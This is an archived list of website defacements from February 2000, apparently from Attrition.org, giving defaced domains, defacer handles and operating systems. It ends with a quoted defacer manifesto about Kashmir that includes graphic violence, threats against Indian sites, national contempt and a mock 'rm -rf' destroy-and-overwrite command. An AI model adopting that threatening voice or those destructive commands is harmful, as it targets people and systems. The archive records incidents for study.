www.darkharbingers.com Site Title: Allen Edger Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.darkharbingers.com Operating System: Windows Potentially offensive content on defaced page. Defaced domain: www.fantex.com Site Title: C.S.TEC.USA., INC. Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.fantex.com Defaced by: paragone Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.levi.com Site Title: Levi Strauss & Company Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.levi.com Defaced by: avirex Operating System: NT Previously defaced on 00.01.31 by avirex ATTRITION Staff Comment: 2nd defacement in 2 days of this site Defaced domain: kssna.com Site Title: Kyung Sung Sea&Air Co., Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/kssna.com Defaced by: synk Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.car.gov.co Site Title: Corporación Autónoma Regional de Cundinamarca Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.car.gov.co Defaced by: The Killer Operating System: Windows NT (Microsoft-IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.azlan.nl Site Title: Azlan Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.azlan.nl Defaced by: ViPER Operating System: Windows NT (Microsoft-IIS/4.0) Defaced domain: www.tcefl.pr.gov.br Site Title: Companhia De Informatica Do Parana - Celepar Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.tcefl.pr.gov.br Defaced by: VSO Team Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.csdept.keene.edu Site Title: Keene State College Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.csdept.keene.edu Defaced by: ner0tec Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.cdcs.com Site Title: C & D Consulting, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.cdcs.com Defaced by: VSO Inc Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.30, 00.01.22, 99.11.14 by PKiller, slash, DHC Potentially offensive content on defaced page. Defaced domain: www.partizan.co.yu Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.partizan.co.yu Defaced by: SoiraM Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.rodmar.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.rodmar.co.za Defaced by: Tr1pl3 S31S Operating System: NT Defaced domain: www.dnp.gov.co Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.dnp.gov.co Defaced by: KabraLzZ Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.kidslearning.com Site Title: kids Learning Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.kidslearning.com Defaced by: OHB Operating System: NT Previously defaced on 00.01.30 by The Killer Potentially offensive content on defaced page. Defaced domain: www.maderacoe.k12.ca.us Site Title: California K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.maderacoe.k12.ca.us Defaced by: protokol Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.centralindiana.com Site Title: Crawford Communications, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.centralindiana.com Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Site Title: CISA Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.cisasailing.org Defaced by: Crime Boys Operating System: Windows NT Previously defaced on 00.01.21 by Team Echo Potentially offensive content on defaced page. Defaced domain: www.imaginet.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.imaginet.co.za Defaced by: akt0r Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.compcom.com.au Site Title: Communications Projects and Computing Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.compcom.com.au Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.lschs.wyndmoor.pa.us Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.lschs.wyndmoor.pa.us Defaced by: confusion Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: webhost.co.ocean.nj.us Site Title: Ocean, New Jersey Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/webhost.co.ocean.nj.us Defaced by: confusion Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: ns1.culver-city.ca.us Site Title: Culver City, California Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/ns1.culver-city.ca.us Defaced by: confusion Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: www.yolocounty.org Site Title: AmrouTechnologies Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.yolocounty.org Defaced by: confusion Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: www.lgenterprises.threadnet.com Site Title: Thread Net Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.lgenterprises.threadnet.com Defaced by: ph33r the b33r Operating System: Linux Potentially offensive content on defaced page. Defaced domain: mccs.co.moore.nc.us Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/mccs.co.moore.nc.us Defaced by: confusion Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: www.dreamshell.com Site Title: DreamShell Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.dreamshell.com Defaced by: Dor Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.chordboard.com Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.chordboard.com Defaced by: snow Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.enoch.com Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.enoch.com Defaced by: snow Operating System: Windows NT (IIS/3.0) Previously defaced on 99.05.17 by forpaxe Potentially offensive content on defaced page. Defaced domain: www.sglyne.com Site Title: Sglyne Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.sglyne.com Defaced by: DEATHaCeS 4nd InSt|nCt Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.metris.be Site Title: Metris nv Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.metris.be Defaced by: Illusions Team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cfaith.org Site Title: Faith Center Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.cfaith.org Defaced by: tws Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tyranny.org Site Title: Tyranny.org Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.tyranny.org Defaced by: NeoTek Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.westcon.com Site Title: Westcon Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.westcon.com Defaced by: Wild Karrde Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.environmentalshop.com Site Title: Air & Waste Management Association Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.environmentalshop.com Defaced by: moron signed as "(/)ï§/-ë®_Ë Operating System: FreeBSD ATTRITION Staff Comment: Netcraft: [9]www.environmentalshop.com is running Microsoft-IIS/4.0 on Defaced domain: www.ekitchennews.com Site Title: SLTD Media Production Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.ekitchennews.com Defaced by: nemesystm Operating System: FreeBSD Potentially offensive content on defaced page. Defaced domain: www.dtr-software.com Site Title: DTR Software International Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.dtr-software.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cameo.com.tw Site Title: Cameo Communications Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.cameo.com.tw Defaced by: Crime Boys Operating System: Windows NT (IIS/4.0) Previously defaced on 99.09.08 by Potentially offensive content on defaced page. Defaced domain: www.sltd.com Site Title: sltd Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.sltd.com Defaced by: nemesystm Operating System: FreeBSD Potentially offensive content on defaced page. Defaced domain: www.wohcrew.com Site Title: WOH Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.wohcrew.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.setindia.com Site Title: Sony Entertainment Television India Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.setindia.com Defaced by: Harkat-ul-mOs Operating System: Linux Potentially offensive content on defaced page. ATTRITION Staff Comment: Very interesting message in this defacement. Definite signs of hacktivism. Defaced domain: www.nirveradio.com Site Title: NIRVE Sports LTD Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.nirveradio.com Defaced by: trent Operating System: Linux Potentially offensive content on defaced page. Defaced domain: careers.altavista.com Site Title: Digital Equipment Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/careers.altavista.com Defaced by: unknown Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: dolphin.kyungsung.ac.kr Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/dolphin.kyungsung.ac.kr Defaced by: kryptek Operating System: Solaris 2.5x HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.ehsal.be Site Title: EHSAL Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.ehsal.be Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.scroc.com Site Title: Scroc Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.scroc.com Defaced by: Illusions Team Operating System: Irix Potentially offensive content on defaced page. Defaced domain: www.lakelandc.ab.ca Site Title: Lakeland College Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.lakelandc.ab.ca Defaced by: Illusions Team Operating System: Windows NT Previously defaced on 00.01.29 by Net Illusion Potentially offensive content on defaced page. Defaced domain: venom.byu.edu Site Title: Brigham Young University Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/venom.byu.edu Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.aneel.gov.br Site Title: Aneel-Agencia Nacional de Energia Eletrica Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.aneel.gov.br Defaced by: CYB3R FUCK3RS Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.28 by Rogue Potentially offensive content on defaced page. Defaced domain: www.crimewatch.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.crimewatch.co.za Defaced by: #Dorknet Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: dedaana.otd.com Site Title: OTD, Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/dedaana.otd.com Defaced by: Illusions Team Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.xandria.com Site Title: Lawrence Research Group Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.xandria.com Defaced by: Protokol Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.hospital.uchile.cl Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.hospital.uchile.cl Defaced by: BlacKcODe Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.dupeit.com Site Title: Corporate Systems Center Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.dupeit.com Defaced by: protokol Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. ATTRITION Staff Comment: mass: www.scsidrives.com Defaced domain: xmail.senate.be Site Title: Senat de Belgique Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/xmail.senate.be Defaced by: #Dorknet Operating System: Windows NT Potentially offensive content on defaced page. ATTRITION Staff Comment: This defacement has a message regarding Joerg Haider and the Austrian Freedom Party. Mention of possible targets in the *.gv.at domain. (For more information about this issue, read: http://news.bbc.co.uk/hi/english/world/europe/newsid_632000/632039.stm ) The site of the Belgium Senate was defaced by Illusions Team and NOT #Dorknet. My apologies for the confusion. Defaced domain: issfire1.co.palm-beach.fl.us Site Title: ISS Firewall for Palm Beach County, Florida Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/issfire1.co.palm-beach.fl.us Defaced by: suave Operating System: Windows NT Defaced domain: www.wetjeans.com Site Title: WS Associates Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.wetjeans.com Defaced by: LA|Calif Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.xstreams.com Site Title: Crawford Software Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.xstreams.com Defaced by: LA|Calif Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: koala.harc.edu Site Title: Houston Advanced Research Center Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/koala.harc.edu Defaced by: suave Operating System: WinNT Potentially offensive content on defaced page. Site Title: ESCOLA AGROTECNICA FEDERAL DE BAMBUI Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.eafbambui.gov.br Defaced by: KabraLzZ Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: www.ivi.org Site Title: International Vaccine Institute Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.ivi.org Defaced by: suave Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.20 by confusion Potentially offensive content on defaced page. Defaced domain: www.harc.edu Site Title: Houston Advanced Research Center Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.harc.edu Defaced by: suave Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.lep.ibge.gov.br Site Title: IBGE - Fundacao Instituto Brasileiro De Geografia Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.lep.ibge.gov.br Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page Defaced domain: www.porzellanklinik.de Site Title: PKS Porzellanklinik System GmbH Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.porzellanklinik.de Defaced by: dot-slash crew Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. domain: www.planetalatino.com Site Title: Grupo Interconect Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.planetalatino.com Defaced by: c0rvus Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.porno.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.porno.co.za Defaced by: DoRKnET Operating System: Red Hat Linux Previously defaced on [00.01.29] by HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.cofcc.org Site Title: Council of Conservative Citizens Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.cofcc.org Operating System: Solaris Potentially offensive content on defaced page. ATTRITION Staff Comment: Political Defacement Defaced domain: www.uqi.edu.mx Site Title: Universidad Quetzalcoatl de Irapuato Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.uqi.edu.mx Defaced by: Gupo and Ka0s Operating System: Windows NT Defaced domain: www.interpower.com Site Title: Panel Components Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.interpower.com Defaced by: verb0 Operating System: Windows NT Defaced domain: www.maliembassy-usa.org Site Title: Mali Embassy in the US Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.maliembassy-usa.org Defaced by: Check0ut Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.bandaelrecodo.com.mx Site Title: RED 2000 Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.bandaelrecodo.com.mx Defaced by: AloneX Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.comercialcarvalho.com.br Site Title: Carvalho e fernandes Ltda Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.comercialcarvalho.com.br Defaced by: Crime Boy's Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.santafeciudad.gov.ar Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.santafeciudad.gov.ar Defaced by: KabraLzZ Operating System: BSDI 4.0.1 Potentially offensive content on defaced page. Defaced domain: www.texasmint.com Site Title: texas mint Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.texasmint.com Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.clairant.com Site Title: Allard Group Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.clairant.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.abn.com.br Site Title: ABN Agencia Brasileira de Noticias Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.abn.com.br Defaced by: Death Knights Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.bewear0303.com Site Title: David Tennyson Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.bewear0303.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.firstgpa.com Site Title: First American Group Purchasing Association Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.firstgpa.com Defaced by: wkD Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.19 by relogic Potentially offensive content on defaced page. Defaced domain: www.rupeesaver.com Site Title: Quicksell Communications Mirror: http://www.attrition.org/mirror/attrition/2000/02/07/www.rupeesaver.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.firstmusic.com Site Title: FM Design Mirror: http://www.attrition.org/mirror/attrition/2000/02/08/www.firstmusic.com Defaced by: Team Echo Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.miniskirt-jp.com Site Title: JP Miniskirts Mirror: http://www.attrition.org/mirror/attrition/2000/02/08/www.miniskirt-jp.com Defaced by: Trent Operating System: Red Hat Linux Potentially offensive content on defaced page. ATTRITION Staff Comment: Yet another bi-polar, manic-depressive kid with a God complex and an obsession with a female. Defaced domain: www.unixcctv.com Site Title: Unix CCTV Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.unixcctv.com Defaced by: sabu Operating System: FreeBSD 2.2.1 - 4.0 Potentially offensive content on defaced page. Defaced domain: www.nasulgc.org Site Title: National Association of State Universities and Land-Grant Colleges Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.nasulgc.org Defaced by: ZeroForce Operating System: Windows NT Defaced domain: www.newmilltrout.com Site Title: Newmill Trout & Deer Farm Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.newmilltrout.com Defaced by: Team Echo Potentially offensive content on defaced page. Defaced domain: newmilltrout.com Site Title: Newmill Trout & Deer Farm Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/newmilltrout.com Defaced by: Team Echo Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: ip-250.la.com Site Title: LA.COM Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/ip-250.la.com Defaced by: Mindmelt Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.familycomputerworkshop.com Site Title: Family Computer Workshop Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.familycomputerworkshop.com Defaced by: Crime Boys Operating System: Windows NT Previously defaced on many times by Potentially offensive content on defaced page. ATTRITION Staff Comment: redefacing is lame. Defaced domain: www.chickenchoker.com Site Title: Sean Flanigan Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.chickenchoker.com Defaced by: Sabu Operating System: FreeBSD Potentially offensive content on defaced page. Defaced domain: fortleehs.hypermart.net Site Title: Hypermart, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/fortleehs.hypermart.net Defaced by: team inifnity Operating System: BSDI Defaced domain: www.l33to.com Site Title: l33to.com Mirror: http://www.attrition.org/mirror/attrition/2000/02/09/www.l33to.com Defaced by: team inifnity Operating System: Linux Defaced domain: www.troop.org Site Title: Troop 62 Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.troop.org Defaced by: Team Echo Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.texasmint.com Site Title: texas mint Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.texasmint.com Defaced by: CRIME BOY'S Operating System: NT Potentially offensive content on defaced page. Defaced domain: ohr.gsfc.nasa.gov Site Title: National Aeronautics and Space Administration Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/ohr.gsfc.nasa.gov Defaced by: mr_min Operating System: NT ATTRITION Staff Comment: Small notice at bottom of page. Defaced domain: www.gosargon.com Site Title: Sargon Consulting Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.gosargon.com Defaced by: kidblount Operating System: Solaris HIDDEN comments in the HTML. ATTRITION Staff Comment: See the HTML source code for the URL of the material used in this defacement Defaced domain: www.clairant.com Site Title: Allard Group Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.clairant.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.whoisyourdaddy.net Site Title: Mike Anderson Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.whoisyourdaddy.net Defaced by: Ook-Ook Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.fumec.br Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/www.fumec.br Defaced by: Death Knights Operating System: Linux Potentially offensive content on defaced page. Defaced domain: ohr.gsfc.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/2000/02/10/ohr.gsfc.nasa.gov Defaced by: Cyber Fuckers Operating System: Windows NT (IIS/4.0 Potentially offensive content on defaced page. Defaced domain: www.portonet.pt Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.portonet.pt Defaced by: Ph0bic Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.utahaccess.com Site Title: IWS Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.utahaccess.com Defaced by: RAT Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: netserv.mnet.it Site Title: Medianet s.r.l. is a member of the UPITEL consortium Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/netserv.mnet.it Defaced by: X-Gh0sT Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.entertaineon.com Site Title: David Katz Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.entertaineon.com Defaced by: DLX Operating System: Linux HIDDEN comments in the HTML. Defaced domain: www.troop10.org Site Title: Boy Scout Troop 10 Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.troop10.org Potentially offensive content on defaced page. Defaced domain: www.hatfield.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.hatfield.co.za Defaced by: Saint Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tips.com Site Title: Business Consulting Solutions, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.tips.com Defaced by: pimp Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.seniorweb.nl Site Title: Stichting Seniorweb Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.seniorweb.nl Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.aplomet.com Site Title: Applied Logical Methods Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.aplomet.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.nrai.com Site Title: National Registered Agents, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.nrai.com Defaced by: i[S] Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.barker-realty.com Site Title: SpeedScape LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.barker-realty.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.genecochran.com Site Title: SpeedScape, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.genecochran.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.fsbdongola.com Site Title: SpeedScape, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.fsbdongola.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Site Title: Education Systems Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/fugazzi.educorp.edu Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mountainsportsltd.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.mountainsportsltd.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.wabn.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.wabn.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.vol-business.net Defaced by: DHC Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.troop35.org Site Title: Boy Scout Troup 35 Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.troop35.org Defaced by: Team Echo Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.nationalbusiness.edu Site Title: National Business College Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.nationalbusiness.edu Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.coverconnection.com Site Title: Patrick Wyss Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.coverconnection.com Defaced by: Sabu Operating System: FreeBSD Potentially offensive content on defaced page. Defaced domain: www.i2000.es Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.i2000.es Defaced by: kryptek Operating System: Solaris 2.5x Potentially offensive content on defaced page. Defaced domain: www.encontrefacil.com.br Site Title: Labin4 Laboratorio de Informatica Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.encontrefacil.com.br Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.quantumdentistry.com Site Title: SpeedScape Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.quantumdentistry.com Defaced by: DHC Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: eagles.eems.giles.k12.va.us Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/eagles.eems.giles.k12.va.us Defaced by: Team Echo Previously defaced on 99.12.21 by Potentially offensive content on defaced page. Defaced domain: www.triology.net Site Title: Tom Geoco Mirror: http://www.attrition.org/mirror/attrition/2000/02/11/www.triology.net Operating System: OpenBSD 2.5 Potentially offensive content on defaced page. Defaced domain: www.teleplus.com.br Site Title: Teleplus Tecnologia Eletro Eletronica Ltda Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.teleplus.com.br Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. ATTRITION Staff Comment: mass hack: www.arlaisnet.com.br Defaced domain: www.fob.com.br Site Title: FOB Asset Management E Corretora De Seguros Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.fob.com.br Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.e2.com Site Title: E2 Consultants Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.e2.com Defaced by: Carte Blanche Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.iiaa.org Site Title: Independant Insurance Agents of America Mirror: http://www.attrition.org/mirror/attrition/2000/02/12/www.iiaa.org Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. <<<<<<<<<<<<<<<<<<<<<<<<<<<-------[ END ]--------->>>>>>>>>>>>>>>>>>>>>>> Some of the more interesting messages from the above defacements: (re-formatted to fit 80 cols) http://www.attrition.org/mirror/attrition/2000/02/05/www.setindia.com :: [ m O s ] :: This defacement brought to you courtesy of "Harkat-ul-mOs". The Pakistan based terrorist organization that wants India to stop killing innocent civilians. (read women and children) YES! we are terrorists! <EXTRACT> ..... The man was stopped by an Indian army patrol 10 yards from his house, 20 minutes after curfew - his house had no toilet. Just before sunrise the next day , his battered corpse was dumped in front of his house. Permission for a proper funeral was refused, arrangements were made for a burial in a local park. The women blocked the entrance of the park from the Indian Army who were trying to stop the ceremony. </EXTRACT> <EXTRACT> The Indian security forces in Kashmir have systematically violated the Code of Medical Neutrality in Armed Conflict. During the curfew the security forces have prevented medical personnel from evacuating injured people in need of treatment. Ambulance drivers have been the principal victims of these actions, frequently being stopped while on duty. A number have been fired on and beaten, in some cases the medical personnel have been detained, tortured and killed. </EXTRACT> <EXTRACT> Torture is widely practiced in Kashmir as a means of extracting information from detainees, coercing confessions, punishing persons believed sympathetic to the militants and creating a climate of political repression. Torture includes severe methods, which include the psycho-torture: soldiers rape the detainee's wife in front of his eyes. </EXTRACT> <EXTRACT> Patrols downtown. Military squads in the streets, they are looking for militants. 01 Minute to evacuate their homes. Time limit expired. The soldiers enter, bursts of gun fire. Entire families slaughtered. Flesh burned five, ten, fifteen bodies bleeding now while I am writing far away from Kashmir. </EXTRACT> source == http://www.kash-gt.dircon.co.uk/ Kashmir For The Kashmiris ! Kashmir is not a commodity for sale, nor should it be considered a prize for India or Pakistan ! The people of Kashmir are not cattle, to be butchered by one or herded by the other! Kashmiris are people dammit ! They have a right to live... to choose ! Take away the rights they have as human beings, and every muslim shall rise against you ! We will keep "terrorizing" you, defacing sites until there are no more Indian sites left that have yet to be defaced by the :: [ m O s ] :: .... and start all over again ! Your data is not safe, for we are... the :: [ m O s ] :: of the Borg, being an Indian is pathetic, you will be VIOLATED !@#$%! Beware, for some day, someone might.... su God rm -rf /earth/India* echo "The world is now a better place, thank you for your patience. - mOs" > /etc/motd Oh well.. time for the credits ;-) Let us grab this opurtunity to welcome a new member to the :: [ m O s ] :: Say hello to Shahmir, hacked into the world on the 4th of January 2000. Lets hope he turns out l33t0r than his father and uncle ;-) Members : a-ngelz, ps, qrs, drac, evilroot, miller and Shahmir. Greets : 